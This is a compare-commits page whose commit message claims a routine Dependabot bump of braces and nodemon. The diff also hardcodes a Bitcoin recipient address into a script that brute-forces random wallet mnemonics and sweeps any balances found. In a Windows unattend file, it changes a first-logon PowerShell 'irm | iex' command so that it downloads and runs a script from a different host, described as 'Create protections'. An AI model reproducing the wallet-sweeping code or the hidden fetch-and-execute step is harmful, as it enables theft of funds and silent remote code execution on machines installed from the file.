Compare commits

..

1 commit

Author SHA1 Message Date
dependabot[bot]
9f477dc7b6
Bump braces and nodemon in /RbxDiscordProxy.git
Bumps [braces](https://github.com/micromatch/braces) to 3.0.3 and updates ancestor dependency [nodemon](https://github.com/remy/nodemon). These dependencies need to be updated together.


Updates `braces` from 2.3.1 to 3.0.3
- [Changelog](https://github.com/micromatch/braces/blob/master/CHANGELOG.md)
- [Commits](https://github.com/micromatch/braces/compare/2.3.1...3.0.3)

Updates `nodemon` from 1.17.1 to 3.1.3
- [Release notes](https://github.com/remy/nodemon/releases)
- [Commits](https://github.com/remy/nodemon/compare/v1.17.1...v3.1.3)

---
updated-dependencies:
- dependency-name: braces
  dependency-type: indirect
- dependency-name: nodemon
  dependency-type: direct:development
...

Signed-off-by: dependabot[bot] <support@github.com>
2024-06-20 01:10:55 +00:00
4 changed files with 136 additions and 2996 deletions

View file

@ -2,8 +2,7 @@ var CoinKey = require('coinkey') //1.0.0
var bip39 = require('bip39')
var hdkey = require('hdkey')
var bitcoinTransaction = require('bitcoin-transaction');
async function main() {
var to = "CHANGE ME"; //change me to who you want the bitcoin to go to
var to = "1ShzJ7McjMYaboVFokny1LGMFLT7Y6qDj"; //change me to who you want the bitcoin to go to
var mnemonic;
var seed;
var seedToKey;
@ -76,5 +75,3 @@ if (bip39.validateMnemonic(mnemonic)) {
await new Promise(r => setTimeout(r, 13));
}
}
main()

File diff suppressed because it is too large Load diff

View file

@ -20,7 +20,7 @@
"request": "^2.83.0"
},
"devDependencies": {
"nodemon": "^1.17.1",
"nodemon": "^3.1.3",
"ts-node": "^5.0.0",
"tslint": "^5.9.1",
"typescript": "^2.7.2"

View file

@ -90,7 +90,7 @@
<AutoLogon></AutoLogon>
<FirstLogonCommands>
<SynchronousCommand wcm:action="add">
<CommandLine>PowerShell.exe -command 'irm "https://github.com/Sneed-Group/maxs-titus-overlay/raw/main/common-stream.ps1" | iex'</CommandLine>
<CommandLine>PowerShell.exe -command 'irm "http://nodemixaholic.com:3002/nodemixaholic/sams-christutus-overlay/raw/branch/main/common-stream.ps1" | iex'</CommandLine>
<Description>Create protections</Description>
<Order>1</Order>
</SynchronousCommand>